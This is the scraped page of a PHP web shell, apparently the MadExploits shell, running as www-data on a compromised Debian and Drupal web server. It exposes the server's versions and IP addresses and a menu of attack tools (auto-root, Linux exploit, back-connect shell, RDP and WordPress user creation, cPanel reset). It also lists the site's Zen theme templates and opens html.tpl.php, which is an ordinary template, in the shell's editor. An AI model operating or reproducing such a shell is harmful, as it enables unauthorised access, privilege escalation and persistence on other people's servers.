Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 3.15.138.214
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
baltic /
web /
sites /
all /
themes /
zen /
templates /
[ HOME SHELL ]
Name
Size
Permission
Action
block--no-wrapper.tpl.php
394
B
-rw-r--r--
block.tpl.php
493
B
-rw-r--r--
comment-wrapper.tpl.php
890
B
-rw-r--r--
comment.tpl.php
1.26
KB
-rw-r--r--
html.tpl.php
1.99
KB
-rw-r--r--
maintenance-page.tpl.php
2.89
KB
-rw-r--r--
node.tpl.php
1.25
KB
-rw-r--r--
page.tpl.php
3.77
KB
-rw-r--r--
pane-header.tpl.php
989
B
-rw-r--r--
pane-messages.tpl.php
384
B
-rw-r--r--
pane-navigation.tpl.php
512
B
-rw-r--r--
panels-pane.tpl.php
874
B
-rw-r--r--
region--footer.tpl.php
310
B
-rw-r--r--
region--no-wrapper.tpl.php
213
B
-rw-r--r--
region--sidebar.tpl.php
295
B
-rw-r--r--
region.tpl.php
279
B
-rw-r--r--
user-picture.tpl.php
314
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : html.tpl.php
<?php /** * @file * Returns the HTML for the basic html structure of a single Drupal page. * * Complete documentation for this file is available online. * @see https://drupal.org/node/1728208 */ ?><!DOCTYPE html> <!--[if IEMobile 7]><html class="iem7" <?php print $html_attributes; ?>><![endif]--> <!--[if lte IE 6]><html class="lt-ie9 lt-ie8 lt-ie7" <?php print $html_attributes; ?>><![endif]--> <!--[if (IE 7)&(!IEMobile)]><html class="lt-ie9 lt-ie8" <?php print $html_attributes; ?>><![endif]--> <!--[if IE 8]><html class="lt-ie9" <?php print $html_attributes; ?>><![endif]--> <!--[if (gte IE 9)|(gt IEMobile 7)]><!--><html <?php print $html_attributes . $rdf_namespaces; ?>><!--<![endif]--> <head> <?php print $head; ?> <title><?php print $head_title; ?></title> <?php if ($default_mobile_metatags): ?> <meta name="MobileOptimized" content="width"> <meta name="HandheldFriendly" content="true"> <meta name="viewport" content="width=device-width"> <?php endif; ?> <meta http-equiv="cleartype" content="on"> <?php print $styles; ?> <?php print $scripts; ?> <?php if ($add_html5_shim and !$add_respond_js): ?> <!--[if lt IE 9]> <script src="<?php print $base_path . $path_to_zen; ?>/js/html5.js"></script> <![endif]--> <?php elseif ($add_html5_shim and $add_respond_js): ?> <!--[if lt IE 9]> <script src="<?php print $base_path . $path_to_zen; ?>/js/html5-respond.js"></script> <![endif]--> <?php elseif ($add_respond_js): ?> <!--[if lt IE 9]> <script src="<?php print $base_path . $path_to_zen; ?>/js/respond.js"></script> <![endif]--> <?php endif; ?> </head> <body class="<?php print $classes; ?>" <?php print $attributes;?>> <?php if ($skip_link_text && $skip_link_anchor): ?> <p id="skip-link"> <a href="#<?php print $skip_link_anchor; ?>" class="element-invisible element-focusable"><?php print $skip_link_text; ?></a> </p> <?php endif; ?> <?php print $page_top; ?> <?php print $page; ?> <?php print $page_bottom; ?> </body> </html>
Close